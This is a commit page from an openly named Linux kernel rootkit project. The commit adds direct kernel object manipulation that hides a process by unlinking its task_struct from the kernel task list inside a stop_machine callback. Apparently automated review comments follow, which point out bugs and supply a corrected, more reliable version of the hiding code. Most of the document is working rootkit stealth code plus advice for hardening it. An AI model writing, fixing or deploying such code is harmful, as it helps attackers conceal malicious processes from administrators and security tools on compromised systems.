linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 5ac46d2dc56176b04b0825c6253f072638b27ccb
parent b303c8d5268297ee642f012fa81b4c5172ad21b4
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Mon, 25 Jan 2021 12:46:23 +0100

Merge pull request #7 from deurzen/feat/dkom

Feat/dkom
Diffstat:
M rootkit/.gitignore | 1 +
M rootkit/src/pidhide.c | 42 ++++++++++++++++++++++++++++++++++++++++++
2 files changed, 43 insertions(+), 0 deletions(-)

diff --git a/rootkit/.gitignore b/rootkit/.gitignore
@@ -15,3 +15,4 @@
 /rkctl
 /tags
 /*.o.d
+/src/*.o.d
diff --git a/rootkit/src/pidhide.c b/rootkit/src/pidhide.c
@@ -1,6 +1,20 @@
 #include <linux/slab.h>
 #include <linux/pid.h>
+#include <linux/sched.h>
+#include <linux/proc_fs.h>
+#include <linux/sched/task.h>
+#include <linux/stop_machine.h>
+
+#include <linux/fs.h>
+#include <linux/fdtable.h>
+#include <linux/slab.h>
+#include <linux/fs_struct.h>
+#include <linux/pid.h>
+#include <linux/delay.h>
+#include <linux/dirent.h>
+
+#include "common.h"
 #include "hook.h"
 #include "pidhide.h"
@@ -43,6 +57,23 @@ unhide_pids(void)
 }
 }
+int
+del_task_cpu_stopped(void *arg)
+{
+ struct task_struct *ts = (struct task_struct *)arg;
+
+ rwlock_t *rwlock = (rwlock_t *)kallsyms_lookup_name("tasklist_lock");
+
+ if (!ts || !ts->tasks.prev || !ts->tasks.next) {
+ return 0;
+ }
+
+ write_lock_irq(rwlock);
+ list_del(&ts->tasks);
+ write_unlock_irq(rwlock);
+
+ return 0;
+}
 void
 hide_pid(pid_t pid)
@@ -64,6 +95,17 @@ hide_pid(pid_t pid)
 }
 add_pid_to_list(hidden_pids_tail, pid);
+
+ struct pid* pid_struct;
+ pid_struct = find_get_pid(pid);
+
+ if(pid_struct == NULL)
+ return;
+
+ struct task_struct *ts;
+ ts = pid_task(pid_struct, PIDTYPE_PID);
+
+ stop_machine((cpu_stop_fn_t)del_task_cpu_stopped, (void *)ts, NULL);
 }
 void
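Review bot: `<linux/slab.h>` and `<linux/pid.h>` are included a second time in the new header block of the pidhide.c include hunk, even though the two original lines above it already pull them in; drop the duplicates. Several of the added headers (`fdtable.h`, `fs_struct.h`, `delay.h`, `dirent.h`, `proc_fs.h`) are not referenced by anything in this commit's hunks — if nothing else in pidhide.c needs them, they should go too, since every extra kernel header widens the surface the module has to keep compiling against.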
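Review bot: The pointer returned by `kallsyms_lookup_name("tasklist_lock")` in `del_task_cpu_stopped` is never checked, so a failed lookup dereferences NULL inside the stop_machine callback and takes the whole machine down instead of failing the hide; add `if (!rwlock) return -EINVAL;` before the lock (and have the caller look at stop_machine's return, which hide_pid currently discards). The `_irq` lock variants also look wrong here: stop_machine runs its callback with interrupts disabled on every CPU and, as far as I recall, `write_unlock_irq` unconditionally re-enables them on this CPU mid-callback — `write_lock_irqsave(rwlock, flags)` / `write_unlock_irqrestore(rwlock, flags)` preserves the state the caller set up. Plain `list_del` poisons `ts->tasks.prev/next`, which the NULL guard above does not recognise, so a second hide of the same pid (or, presumably, the task's own exit path unlinking `tasks` again) will fault; `list_del_init(&ts->tasks)` leaves a harmless self-linked node instead. Minor: the function should be `static`, and the caller's cast to `cpu_stop_fn_t` is unnecessary since the signature already matches.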
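Review bot: The `struct pid` reference taken by `find_get_pid` in the new tail of `hide_pid` is never released with `put_pid`, so each call leaks one reference, and `ts` from `pid_task` is handed to stop_machine without `get_task_struct`, so nothing prevents the task from being reaped between the lookup and the callback; `pid_task` also expects to be called under `rcu_read_lock()`. The result of stop_machine is ignored as well, so a failure inside the callback leaves the pid recorded in hidden_pids while the task is still linked. The rewrite below pins the task under RCU, drops the pid reference immediately, and releases the task after the list edit; it assumes the earlier part of hide_pid (which starts outside this hunk) is unchanged. Note that this hunk only unlinks — unless the unhide path re-links `ts->tasks`, hiding is one-way.

```c
    add_pid_to_list(hidden_pids_tail, pid);

    struct pid *pid_struct = find_get_pid(pid);
    if (pid_struct == NULL)
        return;

    /* pid_task() must run under rcu_read_lock(); pin the task before the
     * pid reference from find_get_pid() is dropped. */
    rcu_read_lock();
    struct task_struct *ts = pid_task(pid_struct, PIDTYPE_PID);
    if (ts)
        get_task_struct(ts);
    rcu_read_unlock();
    put_pid(pid_struct);

    if (!ts)
        return;

    if (stop_machine(del_task_cpu_stopped, ts, NULL))
        pr_warn("pidhide: failed to unlink task %d\n", pid);
    put_task_struct(ts);
```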